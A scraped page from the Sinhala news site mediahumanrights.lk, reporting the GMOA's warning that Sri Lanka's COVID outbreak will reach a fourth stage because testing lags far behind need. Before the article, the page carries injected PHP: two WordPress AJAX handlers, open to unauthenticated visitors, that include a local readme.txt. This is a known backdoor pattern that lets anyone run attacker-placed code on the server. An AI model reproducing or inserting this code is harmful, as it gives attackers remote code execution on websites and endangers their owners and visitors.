if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කිවුව දේ ඇහුවේ නෑ.. කොරෝනා 04වන අදියරට එනවා.. දරුණු ලෙස සමාජය ගිල ගන්නවා…- GMOA - mediahumanrights.lk
mediahumanrights.lk
Local News News

කිවුව දේ ඇහුවේ නෑ.. කොරෝනා 04වන අදියරට එනවා.. දරුණු ලෙස සමාජය ගිල ගන්නවා…- GMOA

ඉදිරි සති දෙක තුළ මෙරට කොරෝ රෝගීන් ඉහළ ප්‍රතිශතයක් වාර්තා වීම නොවැළැක්විය හැකි බව රජයේ වෛද්‍ය නිලධාරීන්ගේ සංගමය අනතුරු අඟවයි.

වෛරසය ආසාදිතයන් හදුනා ගැනීමට පරීක්ෂණ වැඩි කරන්නයි ලබාදුන් උපදෙස් නොතකා හරිමින් සෞඛ්‍ය අමාත්‍යාංශය කටයුතු කිරීමෙන් නිසා වෛරස ව්‍යාප්තිය 04වන අදියරට පැමිණ සමාජය කරා පැතිරීම දක්වා ව්‍යාප්ත වනු ඇතැයි ද සංගමයේ ලේකම් වෛද්‍ය හරිත අලුත්ගේ මහතා සඳහන් කරයි.

පලමු කොරෝනා රෝගියා මෙරටින් වාර්තා වූ අවස්ථාවේදීම ඉදිරියේදී රෝගීන් වර්ධනයක් ඇතිවන බැවින් පරීක්ෂණ වැඩි කළ යුතු බව පෙන්වා දුන් නමුත් ඒ පිලිබඳ උනන්දුවක් බලධාරීන් නොදැක්වීම නිසා කොරෝනා වෛරසය දරුණු අන්දමින් සමාජය ගිලගැනීමේ අවධානමක් පවතින බවද ඔහු පැවසීය.

ආසාදිතයන් හඳුනාගැනීමේ පරීක්ෂණ දිනකට 1500ක් පමණ සිදු කළ යුතුව ඇතත් දැනට සිදු කරන්නේ පරීක්ෂණ 300ක් පමණ යැයි ද ලේකම්වරයා සඳහන් කළේ ය.
(under the courtesy of lankacnews.com news web)

Related posts

සචිත‍්‍ර සේනානායක අත්අඩංගුවට ගනී..

Shiran Viraj

"ඉලක්කය මම නම් මට සමා වෙන්න" – අස්ගිරි නිවේදනයෙන් පසු SB මහා සංඝරත්නයෙන් සමාව ගනී

Shiran Viraj

තම පාසලේ ම සිසුවිය ගැබිනියක් කළ ගුරුවරයා

Shiran Viraj